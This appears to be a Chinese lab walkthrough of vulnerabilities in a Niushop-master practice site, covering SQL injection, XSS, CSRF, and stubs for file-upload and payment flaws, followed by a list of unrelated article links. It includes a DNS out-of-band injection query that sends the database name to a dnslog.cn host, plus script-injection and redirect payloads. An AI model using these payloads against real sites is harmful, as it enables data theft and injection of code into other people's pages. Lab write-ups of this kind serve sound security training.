当前位置: 首页 > news >正文

Niushop-master靶场漏洞

靶场搭建

将 niushop-master.zip 压缩包放到网站的根目录,解压后访问

浏览器访问 install.php ,根据提示安装即可

1.SQL注入漏洞

随便选择一种商品分类,发现有参数,测试注入

测试闭合发现页面报错有sql注入

应该是环境的问题,但是这不影响我们判断存在sql注入

该网站还有一处sql注入漏洞,我们可以进入后台系统--设置--数据库管理--SQL执行与导入

输入查询语句,点击执行,成功执行,但是我们得不到具体信息,这时需要利用外带注入方法

外带原理:将dnslog平台中的特有字段payload带⼊⽬标发起dns请求,通过dns解析将请求后的关键信息组合新的三级域名带出,在dns服务器的dns⽇志中显示出来 DNSLog Platform

select load_file(concat('\\\\',(select database()),'.95xpzc.dnslog.cn\\abc'))

文件上传漏洞

1.首先写一个一句话木马

XSS漏洞

反射型xss漏洞

登录后台系统--设置--基础设置--商城第三方统计代码

在输入框中输入js弹窗代码,然后点击提交

<script>alert(1)</script>

返回前端页面,刷新,出现弹窗

后台系统还有一处反射型xss漏洞,点击网站--广告位--添加广告

<script>alert(1)</script>

返回前端刷新,点击该广告,页面会出现弹窗

存储型xss漏洞

后台系统还有一处,点击网站--广告位--添加广告

这里的 '链接地址' 可以尝试xss

在自己网站的根目录新建一个 2.html 文件,内容如下

<script>document.location="http://www.baidu.com"</script>

链接地址修改为www下的 2.html

返回前端,刷新页面,点击此广告,页面就会跳转到设置的界面

CSRF漏洞

注册一个普通用户,登录以后修改基本信息

使用bp抓取提交信息的请求包,鼠标右键--相关工具--生成CSRF-Poc--复制HTML

将复制的内容放到自己本地网站的根目录,浏览器访问

点击按钮,就会发现用户信息被修改,说明存在CSRF漏洞

支付漏洞

http://www.lryc.cn/news/508339.html

相关文章:

  • 35道面向初中级前端的基础面试题
  • MFC用List Control 和Picture控件实现界面切换效果
  • 1. 解决前端vue项目 vite打包内存溢出问题
  • Springboot高并发乐观锁
  • 【WPS安装】WPS编译错误总结:WPS编译失败+仅编译成功ungrib等
  • pytorch MoE(专家混合网络)的简单实现。
  • 虚拟机VMware的安装问题ip错误,虚拟网卡
  • Linux下基于最新稳定版ESP-IDF5.3.2开发esp32s3入门hello world输出【入门一】
  • 重温设计模式--命令模式
  • 电力通信规约-104实战
  • 什么是事务
  • 数据结构:双向循坏链表
  • 3.1、SDH的5种标准容器
  • Jenkins介绍
  • 5G学习笔记之Non-Public Network
  • 网页生成鸿蒙App
  • JavaWeb通过Web查询数据库内容:(pfour_webquerymysql)
  • 将java项目部署到linux
  • moviepy将图片序列制作成视频并加载字幕 - python 实现
  • ROS1入门教程5:简单行为处理
  • Vue:实现输入框不能输负数功能
  • 管理系统、微信小程序类源码文档-哔哩哔哩教程同步
  • AOP切点表达式之方法表达式execution
  • clickhouse-题库
  • 在 Sanic 应用中使用内存缓存管理 IP 黑名单
  • 可翻折的CPCI导冷板卡插拔机构
  • 面试题整理9----谈谈对k8s的理解2
  • 12个城市人文扫街、旅拍、人像风光摄影后期Lightroom调色预设
  • 无人设备遥控器之数传功率篇
  • 灭屏情况下,飞行模式+静音模式+插耳,播放音乐,电流异常